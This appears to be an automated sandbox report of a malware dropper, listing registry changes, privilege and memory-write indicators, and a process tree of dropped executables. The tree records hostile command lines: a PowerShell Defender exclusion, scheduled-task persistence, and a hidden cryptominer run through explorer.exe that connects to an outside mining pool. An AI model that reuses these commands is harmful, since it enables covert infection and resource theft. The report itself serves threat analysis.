description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4720 powershell.exe 4720 powershell.exe 4720 powershell.exe 2992 WerFault.exe 2992 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 4004 WerFault.exe 4004 WerFault.exe 5800 WerFault.exe 5800 WerFault.exe 5236 WerFault.exe 5236 WerFault.exe 5748 setup_2.tmp 5748 setup_2.tmp 5364 WerFault.exe 5364 WerFault.exe 5592 WerFault.exe 5592 WerFault.exe 5156 WerFault.exe 5156 WerFault.exe 3604 6011808.exe 3604 6011808.exe 5384 WerFault.exe 5384 WerFault.exe 2444 svchost.exe 2444 svchost.exe 5780 2586827.exe 5780 2586827.exe 6096 5495096.exe 6096 5495096.exe 832 ultramediaburner.tmp 832 ultramediaburner.tmp 4800 Chrome 5.exe 4800 Chrome 5.exe 2104 WerFault.exe 2104 WerFault.exe 5200 5895651.exe 5200 5895651.exe 3080 WerFault.exe 3080 WerFault.exe 4788 4065512.exe 4788 4065512.exe 5344 WerFault.exe 5344 WerFault.exe 5628 8507044.exe 5628 8507044.exe 2924 WerFault.exe 2924 WerFault.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe 1452 SHyqobaetuno.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1896 5024180.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1100 Tue118f55232e4.exe Token: SeAssignPrimaryTokenPrivilege 1100 Tue118f55232e4.exe Token: SeLockMemoryPrivilege 1100 Tue118f55232e4.exe Token: SeIncreaseQuotaPrivilege 1100 Tue118f55232e4.exe Token: SeMachineAccountPrivilege 1100 Tue118f55232e4.exe Token: SeTcbPrivilege 1100 Tue118f55232e4.exe Token: SeSecurityPrivilege 1100 Tue118f55232e4.exe Token: SeTakeOwnershipPrivilege 1100 Tue118f55232e4.exe Token: SeLoadDriverPrivilege 1100 Tue118f55232e4.exe Token: SeSystemProfilePrivilege 1100 Tue118f55232e4.exe Token: SeSystemtimePrivilege 1100 Tue118f55232e4.exe Token: SeProfSingleProcessPrivilege 1100 Tue118f55232e4.exe Token: SeIncBasePriorityPrivilege 1100 Tue118f55232e4.exe Token: SeCreatePagefilePrivilege 1100 Tue118f55232e4.exe Token: SeCreatePermanentPrivilege 1100 Tue118f55232e4.exe Token: SeBackupPrivilege 1100 Tue118f55232e4.exe Token: SeRestorePrivilege 1100 Tue118f55232e4.exe Token: SeShutdownPrivilege 1100 Tue118f55232e4.exe Token: SeDebugPrivilege 1100 Tue118f55232e4.exe Token: SeAuditPrivilege 1100 Tue118f55232e4.exe Token: SeSystemEnvironmentPrivilege 1100 Tue118f55232e4.exe Token: SeChangeNotifyPrivilege 1100 Tue118f55232e4.exe Token: SeRemoteShutdownPrivilege 1100 Tue118f55232e4.exe Token: SeUndockPrivilege 1100 Tue118f55232e4.exe Token: SeSyncAgentPrivilege 1100 Tue118f55232e4.exe Token: SeEnableDelegationPrivilege 1100 Tue118f55232e4.exe Token: SeManageVolumePrivilege 1100 Tue118f55232e4.exe Token: SeImpersonatePrivilege 1100 Tue118f55232e4.exe Token: SeCreateGlobalPrivilege 1100 Tue118f55232e4.exe Token: 31 1100 Tue118f55232e4.exe Token: 32 1100 Tue118f55232e4.exe Token: 33 1100 Tue118f55232e4.exe Token: 34 1100 Tue118f55232e4.exe Token: 35 1100 Tue118f55232e4.exe Token: SeDebugPrivilege 1560 Tue11f251db82fb7b.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 2560 Tue11141271fbe5877f.exe Token: SeRestorePrivilege 3820 WerFault.exe Token: SeBackupPrivilege 3820 WerFault.exe Token: SeBackupPrivilege 3820 WerFault.exe Token: SeDebugPrivilege 3604 6011808.exe Token: SeDebugPrivilege 3968 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5140 2.exe Token: SeDebugPrivilege 6000 BearVpn 3.exe Token: SeDebugPrivilege 5780 2586827.exe Token: SeDebugPrivilege 6096 5495096.exe Token: SeDebugPrivilege 5760 postback.exe Token: SeDebugPrivilege 2164 46807GHF____.exe Token: SeDebugPrivilege 4788 4065512.exe Token: SeDebugPrivilege 5200 5895651.exe Token: SeIncreaseQuotaPrivilege 4720 powershell.exe Token: SeSecurityPrivilege 4720 powershell.exe Token: SeTakeOwnershipPrivilege 4720 powershell.exe Token: SeLoadDriverPrivilege 4720 powershell.exe Token: SeSystemProfilePrivilege 4720 powershell.exe Token: SeSystemtimePrivilege 4720 powershell.exe Token: SeProfSingleProcessPrivilege 4720 powershell.exe Token: SeIncBasePriorityPrivilege 4720 powershell.exe Token: SeCreatePagefilePrivilege 4720 powershell.exe Token: SeBackupPrivilege 4720 powershell.exe Token: SeRestorePrivilege 4720 powershell.exe Token: SeShutdownPrivilege 4720 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeSystemEnvironmentPrivilege 4720 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5748 setup_2.tmp 832 ultramediaburner.tmp 6016 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4868 wrote to memory of 4784 4868 setup_x86_x64_install.exe 79 PID 4868 wrote to memory of 4784 4868 setup_x86_x64_install.exe 79 PID 4868 wrote to memory of 4784 4868 setup_x86_x64_install.exe 79 PID 4784 wrote to memory of 3728 4784 setup_installer.exe 80 PID 4784 wrote to memory of 3728 4784 setup_installer.exe 80 PID 4784 wrote to memory of 3728 4784 setup_installer.exe 80 PID 3728 wrote to memory of 1928 3728 setup_install.exe 84 PID 3728 wrote to memory of 1928 3728 setup_install.exe 84 PID 3728 wrote to memory of 1928 3728 setup_install.exe 84 PID 3728 wrote to memory of 1668 3728 setup_install.exe 85 PID 3728 wrote to memory of 1668 3728 setup_install.exe 85 PID 3728 wrote to memory of 1668 3728 setup_install.exe 85 PID 3728 wrote to memory of 5028 3728 setup_install.exe 87 PID 3728 wrote to memory of 5028 3728 setup_install.exe 87 PID 3728 wrote to memory of 5028 3728 setup_install.exe 87 PID 3728 wrote to memory of 3804 3728 setup_install.exe 88 PID 3728 wrote to memory of 3804 3728 setup_install.exe 88 PID 3728 wrote to memory of 3804 3728 setup_install.exe 88 PID 3728 wrote to memory of 5020 3728 setup_install.exe 89 PID 3728 wrote to memory of 5020 3728 setup_install.exe 89 PID 3728 wrote to memory of 5020 3728 setup_install.exe 89 PID 3728 wrote to memory of 4908 3728 setup_install.exe 90 PID 3728 wrote to memory of 4908 3728 setup_install.exe 90 PID 3728 wrote to memory of 4908 3728 setup_install.exe 90 PID 3728 wrote to memory of 2816 3728 setup_install.exe 95 PID 3728 wrote to memory of 2816 3728 setup_install.exe 95 PID 3728 wrote to memory of 2816 3728 setup_install.exe 95 PID 3728 wrote to memory of 4744 3728 setup_install.exe 94 PID 3728 wrote to memory of 4744 3728 setup_install.exe 94 PID 3728 wrote to memory of 4744 3728 setup_install.exe 94 PID 1928 wrote to memory of 4720 1928 cmd.exe 91 PID 1928 wrote to memory of 4720 1928 cmd.exe 91 PID 1928 wrote to memory of 4720 1928 cmd.exe 91 PID 3728 wrote to memory of 2228 3728 setup_install.exe 93 PID 3728 wrote to memory of 2228 3728 setup_install.exe 93 PID 3728 wrote to memory of 2228 3728 setup_install.exe 93 PID 2816 wrote to memory of 3232 2816 cmd.exe 92 PID 2816 wrote to memory of 3232 2816 cmd.exe 92 PID 2816 wrote to memory of 3232 2816 cmd.exe 92 PID 1668 wrote to memory of 772 1668 cmd.exe 97 PID 1668 wrote to memory of 772 1668 cmd.exe 97 PID 1668 wrote to memory of 772 1668 cmd.exe 97 PID 3728 wrote to memory of 788 3728 setup_install.exe 96 PID 3728 wrote to memory of 788 3728 setup_install.exe 96 PID 3728 wrote to memory of 788 3728 setup_install.exe 96 PID 5028 wrote to memory of 1148 5028 cmd.exe 104 PID 5028 wrote to memory of 1148 5028 cmd.exe 104 PID 5028 wrote to memory of 1148 5028 cmd.exe 104 PID 2228 wrote to memory of 1100 2228 cmd.exe 105 PID 2228 wrote to memory of 1100 2228 cmd.exe 105 PID 2228 wrote to memory of 1100 2228 cmd.exe 105 PID 5020 wrote to memory of 1420 5020 cmd.exe 103 PID 5020 wrote to memory of 1420 5020 cmd.exe 103 PID 5020 wrote to memory of 1420 5020 cmd.exe 103 PID 3804 wrote to memory of 1560 3804 cmd.exe 102 PID 3804 wrote to memory of 1560 3804 cmd.exe 102 PID 4908 wrote to memory of 1856 4908 cmd.exe 101 PID 4908 wrote to memory of 1856 4908 cmd.exe 101 PID 4908 wrote to memory of 1856 4908 cmd.exe 101 PID 4744 wrote to memory of 2560 4744 cmd.exe 98 PID 4744 wrote to memory of 2560 4744 cmd.exe 98 PID 1148 wrote to memory of 5016 1148 Tue11b9d76a96506.exe 100 PID 1148 wrote to memory of 5016 1148 Tue11b9d76a96506.exe 100 PID 1148 wrote to memory of 5016 1148 Tue11b9d76a96506.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B254883\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11d7385a978cc.exeTue11d7385a978cc.exe5⤵
- Executes dropped EXE
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11b9d76a96506.exeTue11b9d76a96506.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11f251db82fb7b.exeTue11f251db82fb7b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:4876
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3380
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1320
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:5632
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:928
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:3428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"7⤵
- Executes dropped EXE
PID:1160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5592
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:5284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 6088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:5504 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:4576
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:5388
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5140 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5140 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Users\Admin\AppData\Roaming\5495096.exe"C:\Users\Admin\AppData\Roaming\5495096.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6096 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6096 -s 23369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2104
-
-
-
C:\Users\Admin\AppData\Roaming\5024180.exe"C:\Users\Admin\AppData\Roaming\5024180.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1896
-
-
C:\Users\Admin\AppData\Roaming\1631245.exe"C:\Users\Admin\AppData\Roaming\1631245.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5444
-
-
C:\Users\Admin\AppData\Roaming\8802777.exe"C:\Users\Admin\AppData\Roaming\8802777.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4332
-
-
C:\Users\Admin\AppData\Roaming\4065512.exe"C:\Users\Admin\AppData\Roaming\4065512.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 24649⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:5728
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6000
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue1109eec571ac.exeTue1109eec571ac.exe /mixone5⤵
- Executes dropped EXE
PID:1420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4004
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11bc0507b56295.exeTue11bc0507b56295.exe5⤵
- Executes dropped EXE
PID:1856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 2846⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue118f55232e4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue118f55232e4.exeTue118f55232e4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 16086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5236
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11141271fbe5877f.exeTue11141271fbe5877f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2560 -
C:\ProgramData\6011808.exe"C:\ProgramData\6011808.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3604 -s 23287⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5384
-
-
-
C:\ProgramData\2508132.exe"C:\ProgramData\2508132.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3136 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:5768
-
-
-
C:\ProgramData\5895651.exe"C:\ProgramData\5895651.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5200
-
-
C:\ProgramData\8507044.exe"C:\ProgramData\8507044.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5628
-
-
C:\ProgramData\2586827.exe"C:\ProgramData\2586827.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 24687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe4⤵PID:788
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue112c483dd3245d.exeTue112c483dd3245d.exe5⤵
- Executes dropped EXE
PID:4992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 2886⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2992
-
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv dn8LwwbFRkCXo9mq/8woaw.0.21⤵
- Modifies data under HKEY_USERS
PID:4156
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeTue11e4e580f2e8141a3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5924
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
